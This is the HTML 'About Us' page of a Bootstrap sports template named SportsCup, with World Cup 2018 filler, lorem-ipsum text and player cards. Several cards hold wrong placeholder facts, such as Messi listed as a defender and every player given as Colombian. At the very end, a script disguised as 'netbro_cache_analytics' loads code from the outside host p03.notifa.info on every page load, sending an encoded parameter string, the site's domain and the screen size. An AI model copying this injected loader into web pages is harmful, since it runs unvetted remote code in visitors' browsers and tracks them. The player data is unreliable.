<!DOCTYPE html>
<html lang="en">
    <head>
        <!-- Basic -->
        <meta charset="utf-8">
        <title>SportsCup - Bootstrap 4 Theme for Sports</title>
        <meta name="keywords" content="HTML5 Template" />
        <meta name="description" content="SportsCup - Bootstrap 4 Theme for Sports">
        <meta name="author" content="iwthemes.com">

        <!-- Mobile Metas -->
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <!-- Theme CSS -->
        <link href="assets/css/main.css" rel="stylesheet" media="screen">

        <!-- Favicons -->
        <link rel="shortcut icon" href="img/icons/favicon.ico">
        <link rel="apple-touch-icon" href="img/icons/apple-touch-icon.png">
        <link rel="apple-touch-icon" sizes="72x72" href="img/icons/apple-touch-icon-72x72.png">
        <link rel="apple-touch-icon" sizes="114x114" href="img/icons/apple-touch-icon-114x114.png">
    </head>

    <body>

        <!-- layout-->
        <div id="layout">
            <!-- Header-->
            <header>
                <!-- End headerbox-->
                <div class="headerbox">
                    <div class="container">
                        <div class="row justify-content-between align-items-center">
                            <!-- Logo-->
                            <div class="col">
                               <div class="logo">
                                   <a href="index.html" title="Return Home">
                                        <img src="img/logo.png" alt="Logo" class="logo_img">
                                    </a>
                               </div>
                            </div>
                            <!-- End Logo-->

                            <!-- Adds Header-->
                            <div class="col">
                                <div class="adds">
                                    <a href="http://themeforest.net/user/iwthemes/portfolio?ref=iwthemes" target="_blank">
                                        <img src="img/adds/banner.jpg" alt="" class="img-responsive">
                                    </a>
                                </div>

                                <!-- Call Nav Menu-->
                                <a class="mobile-nav" href="#mobile-nav"><i class="fa fa-bars"></i></a>
                                <!-- End Call Nav Menu-->
                            </div>
                            <!-- End Adds Header-->
                        </div>
                    </div>
                </div>
                <!-- End headerbox-->
            </header>
            <!-- End Header-->

            <!-- mainmenu-->
            <nav class="mainmenu">
                <div class="container">
                    <!-- Menu-->
                    <ul class="sf-menu" id="menu">
                        <li class="current">
                            <a href="index.html">Home</a>
                            <ul class="sub-current">
                                <li>
                                    <a href="index.html">Home 1</a>
                                </li>
                                <li>
                                    <a href="index-2.html">Home 2</a>
                                </li>
                                <li>
                                    <a href="index-3.html">Home 3</a>
                                </li>
                                <li>
                                    <a href="index-4.html">Home 4</a>
                                </li>
                                <li>
                                    <a href="index-5.html">Home 5</a>
                                </li>
                                <li>
                                    <a href="index-6.html">Home 6</a>
                                </li>
                            </ul>
                        </li>

                        <li>
                            <a href="#">World Cup</a>
                            <div class="sf-mega">
                                <div class="row">
                                     <div class="col-md-3">
                                        <h5><i class="fa fa-trophy" aria-hidden="true"></i>World Cup</h5>
                                        <ul>
                                            <li><a href="table-point.html">Point Table</a></li>
                                            <li><a href="fixtures.html">Fixtures</a></li>
                                            <li><a href="groups.html">Groups</a></li>
                                            <li><a href="news-left-sidebar.html">News</a></li>
                                            <li><a href="contact.html">Contact Us</a></li>
                                        </ul>
                                    </div>

                                    <div class="col-md-3">
                                      <h5><i class="fa fa-users" aria-hidden="true"></i> Teams List</h5>
                                      <div class="img-hover">
                                         <img src="img/blog/1.jpg" alt="" class="img-responsive">
                                         <div class="overlay"><a href="teams.html">+</a></div>
                                      </div>
                                    </div>

                                    <div class="col-md-3">
                                      <h5><i class="fa fa-futbol-o" aria-hidden="true"></i> Players List</h5>
                                      <div class="img-hover">
                                         <img src="img/blog/2.jpg" alt="" class="img-responsive">
                                         <div class="overlay"><a href="players.html">+</a></div>
                                      </div>
                                    </div>

                                    <div class="col-md-3">
                                      <h5><i class="fa fa-gamepad" aria-hidden="true"></i> Results Info</h5>
                                      <div class="img-hover">
                                         <img src="img/blog/3.jpg" alt="" class="img-responsive">
                                         <div class="overlay"><a href="results.html">+</a></div>
                                      </div>
                                    </div>
                                </div>
                            </div>
                        </li>

                        <li class="current">
                            <a href="teams.html">Teams</a>
                            <ul class="sub-current">
                                <li>
                                    <a href="teams.html">Teams List</a>
                                </li>
                                <li>
                                    <a href="single-team.html">Single Team</a>
                                </li>
                            </ul>
                        </li>

                        <li class="current">
                            <a href="players.html">Players</a>
                            <ul class="sub-current">
                                <li>
                                    <a href="players.html">Players List</a>
                                </li>
                                <li>
                                    <a href="single-player.html">Single Player</a>
                                </li>
                            </ul>
                        </li>

                        <li>
                            <a href="fixtures.html">Fixtures</a>
                        </li>

                        <li class="current">
                            <a href="results.html">Results</a>
                            <ul class="sub-current">
                                <li>
                                    <a href="results.html">Results List</a>
                                </li>
                                <li>
                                    <a href="single-result.html">Single Result</a>
                                </li>
                            </ul>
                        </li>

                        <li>
                            <a href="table-point.html">Point Table</a>
                        </li>

                        <li>
                            <a href="groups.html">Groups</a>
                        </li>

                        <li>
                            <a href="#">Features</a>
                            <div class="sf-mega">
                                <div class="row">
                                    <div class="col-md-3">
                                        <h5>Features</h5>
                                        <ul>
                                            <li><a href="page-full-width.html">Full Width</a></li>
                                            <li><a href="page-left-sidebar.html">Left Sidebar</a></li>
                                            <li><a href="page-right-sidebar.html">Right Sidebar</a></li>
                                            <li><a href="page-404.html">404 Page</a></li>
                                            <li><a href="page-faq.html">FAQ</a></li>
                                            <li><a href="sitemap.html">Sitemap</a></li>
                                            <li><a href="page-pricing.html">Pricing</a></li>
                                            <li><a href="page-register.html">Register Form</a></li>
                                        </ul>
                                    </div>
                                    <div class="col-md-3">
                                        <h5>Headers & Footers</h5>
                                        <ul>
                                            <li><a href="feature-header-footer-1.html">Header Version 1</a></li>
                                            <li><a href="feature-header-footer-2.html">Header Version 2</a></li>
                                            <li><a href="feature-header-footer-3.html">Header Version 3</a></li>
                                            <li><a href="index-5.html">Header Version 4</a></li>
                                            <li><a href="feature-header-footer-1.html#footer">Footer Version 1</a></li>
                                            <li><a href="feature-header-footer-2.html#footer">Footer Version 2</a></li>
                                            <li><a href="feature-header-footer-3.html#footer">Footer Version 3</a></li>
                                        </ul>
                                    </div>

                                    <div class="col-md-3">
                                        <h5>Pages</h5>
                                        <ul>
                                            <li><a href="page-about.html">About Us</a></li>
                                            <li><a href="single-player.html">About Me</a></li>
                                            <li><a href="services.html">Services</a></li>
                                            <li><a href="single-team.html">Club Info</a></li>
                                            <li><a href="single-result.html">Match Result</a></li>
                                            <li><a href="table-point.html">Positions</a></li>
                                        </ul>
                                    </div>

                                    <div class="col-md-3">
                                        <h5>News</h5>
                                        <ul>
                                            <li>
                                                <a href="news-left-sidebar.html">News Lef Sidebar</a>
                                            </li>
                                            <li>
                                                <a href="news-right-sidebar.html">News Right Sidebar</a>
                                            </li>
                                            <li>
                                                <a href="news-no-sidebar.html">News No Sidebar</a>
                                            </li>
                                            <li>
                                                <a href="single-news.html">Single News</a>
                                            </li>
                                        </ul>
                                    </div>
                                    <i class="fa fa-trophy big-icon" aria-hidden="true"></i>
                                </div>
                            </div>
                        </li>

                        <li>
                            <a href="contact.html">Contact</a>
                        </li>
                    </ul>
                    <!-- End Menu-->
                </div>
            </nav>
            <!-- End mainmenu-->

            <!-- Mobile Nav-->
            <div id="mobile-nav">
                <!-- Menu-->
                <ul>
                    <li>
                        <a href="index.html">Home</a>
                        <ul>
                           <li>
                                <a href="index-1.html">Home 1</a>
                            </li>
                            <li>
                                <a href="index-2.html">Home 2</a>
                            </li>
                            <li>
                                <a href="index-3.html">Home 3</a>
                            </li>
                            <li>
                                <a href="index-4.html">Home 4</a>
                            </li>
                            <li>
                                <a href="index-5.html">Home 5</a>
                            </li>
                            <li>
                                <a href="index-6.html">Home 6</a>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="#">World Cup</a>
                        <ul>
                            <li>
                               <a href="#">World Cup</a>
                                <ul>
                                    <li><a href="table-point.html">Point Table</a></li>
                                    <li><a href="fixtures.html">Fixtures</a></li>
                                    <li><a href="groups.html">Groups</a></li>
                                    <li><a href="news-left-sidebar.html">News</a></li>
                                    <li><a href="contact.html">Contact Us</a></li>
                                </ul>
                            </li>

                            <li><a href="teams.html">Teams List</a></li>
                            <li><a href="players.html">Players List</a></li>
                            <li><a href="results.html">Results List</a></li>
                        </ul>
                    </li>

                    <li>
                        <a href="teams.html">Teams</a>
                        <ul>
                            <li>
                                <a href="teams.html">Teams List</a>
                            </li>
                            <li>
                                <a href="single-team.html">Single Team</a>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="players.html">Players</a>
                        <ul>
                            <li>
                                <a href="players.html">Players List</a>
                            </li>
                            <li>
                                <a href="single-player.html">Single Player</a>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="fixtures.html">Fixtures</a>
                    </li>

                    <li>
                        <a href="results.html">Results</a>
                        <ul>
                            <li>
                                <a href="results.html">Results List</a>
                            </li>
                            <li>
                                <a href="single-result.html">Single Result</a>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="table-point.html">Point Table</a>
                    </li>

                    <li>
                        <a href="groups.html">Groups</a>
                    </li>

                    <li>
                        <a href="#">Features</a>
                        <ul>
                            <li>
                                <a href="#">Features</a>
                                <ul>
                                    <li><a href="page-full-width.html">Full Width</a></li>
                                    <li><a href="page-left-sidebar.html">Left Sidebar</a></li>
                                    <li><a href="page-right-sidebar.html">Right Sidebar</a></li>
                                    <li><a href="page-404.html">404 Page</a></li>
                                    <li><a href="page-faq.html">FAQ</a></li>
                                    <li><a href="sitemap.html">Sitemap</a></li>
                                    <li><a href="page-pricing.html">Pricing</a></li>
                                    <li><a href="page-register.html">Register Form</a></li>
                                </ul>
                            </li>

                            <li>
                                <a href="#">Headers & Footers</a>
                                <ul>
                                    <li><a href="feature-header-footer-1.html">Header Version 1</a></li>
                                    <li><a href="feature-header-footer-2.html">Header Version 2</a></li>
                                    <li><a href="feature-header-footer-3.html">Header Version 3</a></li>
                                    <li><a href="index-5.html">Header Version 4</a></li>
                                    <li><a href="feature-header-footer-1.html#footer">Footer Version 1</a></li>
                                    <li><a href="feature-header-footer-2.html#footer">Footer Version 2</a></li>
                                    <li><a href="feature-header-footer-3.html#footer">Footer Version 3</a></li>
                                </ul>
                            </li>
                            <li>
                                <a href="#">Pages</a>
                                <ul>
                                    <li><a href="page-about.html">About Us</a></li>
                                    <li><a href="single-player.html">About Me</a></li>
                                    <li><a href="feature-header-footer-2.html#footer">Services</a></li>
                                    <li><a href="single-team.html">Club Info</a></li>
                                    <li><a href="single-result.html">Match Result</a></li>
                                    <li><a href="table-point.html">Positions</a></li>
                                </ul>
                            </li>
                            <li>
                                <a href="#">News</a>
                                <ul>
                                    <li>
                                        <a href="news-left-sidebar.html">News Lef Sidebar</a>
                                    </li>
                                    <li>
                                        <a href="news-right-sidebar.html">News Right Sidebar</a>
                                    </li>
                                    <li>
                                        <a href="news-no-sidebar.html">News No Sidebar</a>
                                    </li>
                                    <li>
                                        <a href="single-news.html">Single News</a>
                                    </li>
                                </ul>
                            </li>
                        </ul>
                    </li>

                    <li>
                        <a href="contact.html">Contact</a>
                    </li>
                </ul>
                <!-- End Menu-->
            </div>
            <!-- End Mobile Nav-->

            <!-- Section Title -->
            <div class="section-title big-title" style="background:url(img/locations/3.jpg);">
                <div class="container">
                    <div class="row">
                        <div class="col-md-8">
                            <h1>Page About Us</h1>
                        </div>

                        <div class="col-md-4">
                            <div class="breadcrumbs">
                                <ul>
                                    <li><a href="index.html">Home</a></li>
                                    <li>Inner Page</li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <!-- End Section Title -->

            <!-- Section Area - Content Central -->
            <section class="content-info">

                <!-- White Section -->
                <div class="white-section paddings">
                    <div class="container">
                        <div class="row">
                            <div class="col-lg-5">
                                <img src="img/locations/1.jpg" alt="">
                            </div>
                            <div class="col-lg-7">
                                <h4 class="subtitle">
                                   <span>Company Value</span>
                                    Who Are You
                                </h4>
                                <p>The top seeds in Groups C and D both have designs on winning their respective sections. But if one of them advances as a group winner and the other as a runner-up, then we will be seeing Lionel Messi facing off against Antoine Griezmann either in Kazan (30 June) or Nizhny Novgorod (1 July), depending on their team’s group placings.</p>

                                <div class="row">
                                    <div class="col-lg-6">
                                        <h5>Our Mission</h5>
                                        <p>Lorem iur adipiscing elit. Ut vehicula dapibus augue nec maximustiam eleifend magna erat, quis vestibulum lacus mattis sit ametec pellentesque lorem sapien.</p>
                                    </div>
                                    <div class="col-lg-6">
                                        <h5>Our Vision</h5>
                                        <p>Lorem iur adipiscing elit. Ut vehicula dapibus augue nec maximustiam eleifend magna erat, quis vestibulum lacus mattis sit ametec pellentesque lorem sapien.</p>
                                    </div>
                                </div>
                            </div>
                        </div>

                        <div class="row padding-top">
                            <div class="col-md-6 col-xl-3">
                                <div class="item-boxed-service">
                                    <h4>Soccer Team </h4>
                                    <p>Best Sports Features</p>
                                    <a href="#"><i class="fa fa-plus-circle"></i>View More</a>
                                </div>
                            </div>

                            <div class="col-md-6 col-xl-3">
                                <div class="item-boxed-service">
                                    <h4>Club Features</h4>
                                    <p>Best Sports Features</p>
                                    <a href="#"><i class="fa fa-plus-circle"></i>View More</a>
                                </div>
                            </div>

                            <div class="col-md-6 col-xl-3">
                                <div class="item-boxed-service">
                                    <h4>Won cups</h4>
                                    <p>Best Sports Features</p>
                                    <a href="#"><i class="fa fa-plus-circle"></i>View More</a>
                                </div>
                            </div>

                            <div class="col-md-6 col-xl-3">
                                <div class="item-boxed-service">
                                    <h4>Technical body</h4>
                                    <p>Best Sports Features</p>
                                    <a href="#"><i class="fa fa-plus-circle"></i>View More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- End White Section -->

                <!-- Parallax Section -->
                <div class="parallax-section" style="background:url(img/slide/3.jpg);">
                    <div class="container">
                        <div class="row justify-content-center">
                            <div class="col-md-12 text-center">
                                <h1 class="big-title">We are a great team</h1>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- End Gray Section -->

                <!-- End gray Section -->
                <div class="default-section paddings">
                    <div class="container">
                        <div class="row">
                             <!-- Item Player -->
                            <div class="col-xl-3 col-lg-4 col-md-6">
                                <div class="item-player">
                                    <div class="head-player">
                                        <img src="img/players/1.jpg" alt="location-team">
                                        <div class="overlay"><a href="single-player.html">+</a></div>
                                    </div>
                                    <div class="info-player">
                                        <span class="number-player">
                                            13
                                        </span>
                                        <h4>
                                            Cristiano Ronaldo
                                            <span>Forward</span>
                                        </h4>
                                        <ul>
                                            <li>
                                                <strong>NATIONALITY</strong> <span><img src="img/clubs-logos/colombia.png" alt=""> Colombia </span
                                            </li>
                                            <li><strong>MATCHES:</strong> <span>90</span></li>
                                            <li><strong>AGE:</strong> <span>28</span></li>
                                        </ul>
                                    </div>
                                    <a href="single-player.html" class="btn">View Player <i class="fa fa-angle-right" aria-hidden="true"></i></a>
                                </div>
                            </div>
                            <!-- End Item Player -->

                            <!-- Item Player -->
                            <div class="col-xl-3 col-lg-4 col-md-6">
                                <div class="item-player">
                                    <div class="head-player">
                                        <img src="img/players/2.jpg" alt="location-team">
                                        <div class="overlay"><a href="single-player.html">+</a></div>
                                    </div>
                                    <div class="info-player">
                                        <span class="number-player">
                                            10
                                        </span>
                                        <h4>
                                            Lionel Messi
                                            <span>Defender</span>
                                        </h4>
                                        <ul>
                                            <li>
                                                <strong>NATIONALITY</strong> <span><img src="img/clubs-logos/colombia.png" alt=""> Colombia </span
                                            </li>
                                            <li><strong>MATCHES:</strong> <span>90</span></li>
                                            <li><strong>AGE:</strong> <span>28</span></li>
                                        </ul>
                                    </div>
                                    <a href="single-player.html" class="btn">View Player <i class="fa fa-angle-right" aria-hidden="true"></i></a>
                                </div>
                            </div>
                            <!-- End Item Player -->

                            <!-- Item Player -->
                            <div class="col-xl-3 col-lg-4 col-md-6">
                                <div class="item-player">
                                    <div class="head-player">
                                        <img src="img/players/3.jpg" alt="location-team">
                                        <div class="overlay"><a href="single-player.html">+</a></div>
                                    </div>
                                    <div class="info-player">
                                        <span class="number-player">
                                            2
                                        </span>
                                        <h4>
                                            Neymar
                                            <span>Midfielder</span>
                                        </h4>
                                        <ul>
                                            <li>
                                                <strong>NATIONALITY</strong> <span><img src="img/clubs-logos/colombia.png" alt=""> Colombia </span
                                            </li>
                                            <li><strong>MATCHES:</strong> <span>90</span></li>
                                            <li><strong>AGE:</strong> <span>28</span></li>
                                        </ul>
                                    </div>
                                    <a href="single-player.html" class="btn">View Player <i class="fa fa-angle-right" aria-hidden="true"></i></a>
                                </div>
                            </div>
                            <!-- End Item Player -->

                            <!-- Item Player -->
                            <div class="col-xl-3 col-lg-4 col-md-6">
                                <div class="item-player">
                                    <div class="head-player">
                                        <img src="img/players/4.jpg" alt="location-team">
                                        <div class="overlay"><a href="single-player.html">+</a></div>
                                    </div>
                                    <div class="info-player">
                                        <span class="number-player">
                                            2
                                        </span>
                                        <h4>
                                            Luis Suárez
                                            <span>Goalkeeper</span>
                                        </h4>
                                        <ul>
                                            <li>
                                                <strong>NATIONALITY</strong> <span><img src="img/clubs-logos/colombia.png" alt=""> Colombia </span
                                            </li>
                                            <li><strong>MATCHES:</strong> <span>90</span></li>
                                            <li><strong>AGE:</strong> <span>28</span></li>
                                        </ul>
                                    </div>
                                    <a href="single-player.html" class="btn">View Player <i class="fa fa-angle-right" aria-hidden="true"></i></a>
                                </div>
                            </div>
                            <!-- End Item Player -->
                        </div>
                    </div>
                </div>
                <!-- End Gray Section -->

                <!-- White Section -->
                <div class="white-section paddings">
                    <div class="container">
                       <!--Items Club News -->
                       <div class="row">
                          <div class="col-md-12">
                              <h3 class="clear-title">Latest News</h3>
                          </div>

                          <!--Item Club News -->
                          <div class="col-lg-6 col-xl-4">
                               <!-- Widget Text-->
                                <div class="panel-box">
                                    <div class="titles no-margin">
                                        <h4><a href="#">World football's dates.</a></h4>
                                    </div>
                                    <a href="#"><img src="img/blog/1.jpg" alt=""></a>
                                    <div class="row">
                                       <div class="info-panel">
                                            <p>Fans from all around the world can apply for 2018 FIFA World Cup™ tickets as the first window of sales.</p>
                                       </div>
                                    </div>
                                </div>
                                <!-- End Widget Text-->
                           </div>
                           <!--End Item Club News -->

                           <!--Item Club News -->
                          <div class="col-lg-6 col-xl-4">
                               <!-- Widget Text-->
                                <div class="panel-box">
                                    <div class="titles no-margin">
                                        <h4><a href="#">Mbappe’s year to remember</a></h4>
                                    </div>
                                    <a href="#"><img src="img/blog/2.jpg" alt=""></a>
                                    <div class="row">
                                       <div class="info-panel">
                                            <p>Tickets may be purchased online by using Visa payment cards or Visa Checkout. Visa is the official.</p>
                                       </div>
                                    </div>
                                </div>
                                <!-- End Widget Text-->
                           </div>
                           <!--End Item Club News -->

                           <!--Item Club News -->
                          <div class="col-lg-6 col-xl-4">
                               <!-- Widget Text-->
                                <div class="panel-box">
                                    <div class="titles no-margin">
                                        <h4><a href="#">Egypt are one family</a></h4>
                                    </div>
                                    <a href="#"><img src="img/blog/3.jpg" alt=""></a>
                                    <div class="row">
                                       <div class="info-panel">
                                            <p>Successful applicants who have applied for supporter tickets and conditional supporter tickets will.</p>
                                       </div>
                                    </div>
                                </div>
                                <!-- End Widget Text-->
                           </div>
                           <!--End Item Club News -->
                       </div>
                       <!--End Items Club News -->
                    </div>
                </div>
                <!-- End White Section -->

                <!-- Sponsors-->
                <div class="default-section paddings">
                    <div class="container">
                        <!--Sponsors CLub -->
                       <div class="row no-line-height">
                              <div class="col-md-12">
                                  <h3 class="clear-title">Sponsors</h3>
                              </div>
                        </div>
                        <!--End Sponsors CLub -->

                        <ul class="sponsors-carousel">
                            <li><a href="#"><img src="img/sponsors/1.png" alt=""></a></li>
                            <li><a href="#"><img src="img/sponsors/2.png" alt=""></a></li>
                            <li><a href="#"><img src="img/sponsors/3.png" alt=""></a></li>
                            <li><a href="#"><img src="img/sponsors/4.png" alt=""></a></li>
                            <li><a href="#"><img src="img/sponsors/5.png" alt=""></a></li>
                            <li><a href="#"><img src="img/sponsors/3.png" alt=""></a></li>
                        </ul>

                    </div>
                </div>
                <!-- End Sponsors -->

                <!-- Newsletter -->
                <div class="section-newsletter no-margin">
                    <div class="container">
                        <div class="row">
                            <div class="col-md-12">
                                <div class="text-center">
                                    <h2>Enter your e-mail and <span class="text-resalt">subscribe</span> to our newsletter.</h2>
                                    <p>Duis non lorem porta,  eros sit amet, tempor sem. Donec nunc arcu, semper a tempus et, consequat.</p>
                                </div>
                                <form id="newsletterForm" action="php/mailchip/newsletter-subscribe.php">
                                    <div class="row">
                                        <div class="col-md-6">
                                            <div class="input-group">
                                                <span class="input-group-addon">
                                                    <i class="fa fa-envelope"></i>
                                                </span>
                                                <input class="form-control" placeholder="Your Name" name="name"  type="text" required="required">
                                            </div>
                                        </div>
                                        <div class="col-md-6">
                                            <div class="input-group">
                                                <span class="input-group-addon">
                                                    <i class="fa fa-envelope"></i>
                                                </span>
                                                <input class="form-control" placeholder="Your  Email" name="email"  type="email" required="required">
                                                <span class="input-group-btn">
                                                    <button class="btn btn-primary" type="submit" name="subscribe" >SIGN UP</button>
                                                 </span>
                                            </div>
                                        </div>
                                    </div>
                                </form>
                                <div id="result-newsletter"></div>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- End Newsletter -->
            </section>
            <!-- End Section Area -  Content Central -->

            <div class="instagram-btn">
                <div class="btn-instagram">
                    <i class="fa fa-instagram"></i>
                    FOLLOW
                    <a href="https://www.instagram.com/fifaworldcup/" target="_blank">&#64;fifaworldcup</a>
                </div>
            </div>

            <div class="content-instagram">
                <div id="instafeed"></div>
            </div>

            <!-- footer-->
            <footer id="footer">
                <!-- Footer Top-->
                <div class="top-footer">

                    <!-- Logo Footer-->
                   <div class="col-lg-12">
                        <div class="logo-footer">
                            <h2>Sports Cup</h2>
                        </div>
                   </div>
                    <!-- End Logo Footer-->

                    <!-- Social Icons-->
                    <ul class="social">
                        <li>
                            <div>
                                <a href="#" class="facebook">
                                    <i class="fa fa-facebook"></i>
                                </a>
                            </div>
                        </li>
                        <li>
                            <div>
                                <a href="#" class="twitter-icon">
                                    <i class="fa fa-twitter"></i>
                                </a>
                            </div>
                        </li>
                        <li>
                            <div>
                                <a href="#" class="vimeo">
                                    <i class="fa fa-vimeo-square"></i>
                                </a>
                            </div>
                        </li>
                        <li>
                            <div>
                                <a href="#" class="google-plus">
                                    <i class="fa fa-google-plus"></i>
                                </a>
                            </div>
                        </li>
                        <li>
                            <div>
                                <a href="#" class="youtube">
                                    <i class="fa fa-youtube"></i>
                                </a>
                            </div>
                        </li>
                    </ul>
                    <!-- End Social Icons-->
                </div>
                <!-- End Footer Top-->

                <!-- Links Footer-->
                <div class="links-footer">
                    <div class="container">
                        <div class="row">

                           <!-- Column Links -->
                            <div class="col-lg-2 col-md-5 col-sm-5">
                                <div class="info-links">
                                   <h5>Organisation</h5>
                                    <ul>
                                        <li><a href="#">Volunteers</a></li>
                                        <li><a href="#">Committees</a></li>
                                        <li><a href="#">Official Documents</a></li>
                                        <li><a href="#">Terms of Service</a></li>
                                    </ul>
                                </div>
                            </div>
                            <!-- End Column Links -->

                            <!-- Column Links -->
                            <div class="col-lg-4 col-md-7 col-sm-7">
                                <div class="info-links">
                                   <h5>Groups</h5>
                                    <ul class="columns">
                                        <li><a href="#">GROUP A</a></li>
                                        <li><a href="#">GROUP B</a></li>
                                        <li><a href="#">GROUP C</a></li>
                                        <li><a href="#">GROUP D</a></li>
                                        <li><a href="#">GROUP E</a></li>
                                        <li><a href="#">GROUP F</a></li>
                                        <li><a href="#">GROUP G</a></li>
                                        <li><a href="#">GROUP H</a></li>
                                    </ul>
                                </div>
                            </div>
                            <!-- End Column Links -->

                            <!-- Column Links -->
                            <div class="col-lg-2 col-md-5 col-sm-5">
                                <div class="info-links">
                                   <h5>Interest Links</h5>
                                    <ul>
                                        <li><a href="#">Statistics</a></li>
                                        <li><a href="#">Teams</a></li>
                                        <li><a href="#">Qualifiers</a></li>
                                        <li><a href="#">Ticketing</a></li>
                                    </ul>
                                </div>
                            </div>
                            <!-- End Column Links -->

                            <!-- Column Links -->
                            <div class="col-lg-4 col-md-7 col-sm-7">
                                <div class="info-links">
                                   <h5>Organisation</h5>
                                    <ul class="columns">
                                        <li><a href="#">NIZHNY NOVGOROD</a></li>
                                        <li><a href="#">SAINT PETERSBURG</a></li>
                                        <li><a href="#">EKATERINBURG</a></li>
                                        <li><a href="#">MOSCOW</a></li>
                                        <li><a href="#">KAZAN</a></li>
                                        <li><a href="#">KALININGRAD</a></li>
                                        <li><a href="#">VOLGOGRAD</a></li>
                                        <li><a href="#">ROSTOV-ON-DON</a></li>
                                    </ul>
                                </div>
                            </div>
                            <!-- End Column Links -->

                        </div>
                    </div>
                </div>
                <!-- End Links Footer-->

            </footer>
            <!-- End footer-->

            <!-- footer Down-->
            <div class="footer-down">
                <div class="container">
                    <div class="row">
                        <div class="col-md-12">
                            <p>&copy; 2018 SportsCup . All Rights Reserved</p>
                        </div>
                    </div>
                </div>
            </div>
            <!-- footer Down-->
        </div>
        <!-- End layout-->

        <!-- ======================= JQuery libs =========================== -->
        <!-- jQuery local-->
        <script type="text/javascript" src="assets/js/jquery.js"></script>
        <!-- popper.js-->
        <script type="text/javascript" src="assets/js/popper.min.js"></script>
        <!-- bootstrap.min.js-->
        <script type="text/javascript" src="assets/js/bootstrap.min.js"></script>
        <!-- required-scripts.js-->
        <script type="text/javascript" src="assets/js/theme-scripts.js"></script>
        <!-- theme-main.js-->
        <script type="text/javascript" src="assets/js/theme-main.js"></script>
        <!-- ======================= End JQuery libs =========================== -->

    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAAT0B5ixXONz%2f0mxvbl2RzvGbS5sJhGu9VYmXgtOYpGKXf9qT0cKQQDCzeoYnjIZkjRQC9%2b%2fMKSRqXD06J8%2fXK5F%2f%2bgZNdtRgzRsc%2b334MFZRPRJ%2bZ7V8PfH8DHrHKfmHhlJEfBuWY4ZoF0pfIIlmy10DySQFaHkNJW09uG8nLNlgJkBf7j7ziTsGSgxR6Fvux%2bVhR5ItVHwI5qG8dZavIG32N5K7RosP%2fSxK%2fN03ViI8QaDQYXkFSQQihlwIHTnnoEEEgpciijLmKSoK8cpNYCWWzM4OBQbq7vd41S5dYurnjxnBDwZqX708mGXFgPhKngIiCT0ZskybgmATz2J%2bA2syVUzNBoLd8KyliT9V9%2bkY9mQpqbBXCtzyAMmQaB2DuLJjDFS9kbOHQ%2b9kzztxgTUJ5B3hAv1ore4%2fFC%2fceaeQNo1o64gwTT0EWa04%2f1C9cwveRB5lpPLBtf4ckieqtz4VD7M2TwCYqzpWzaybYIWgv8PzgIK8tg%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
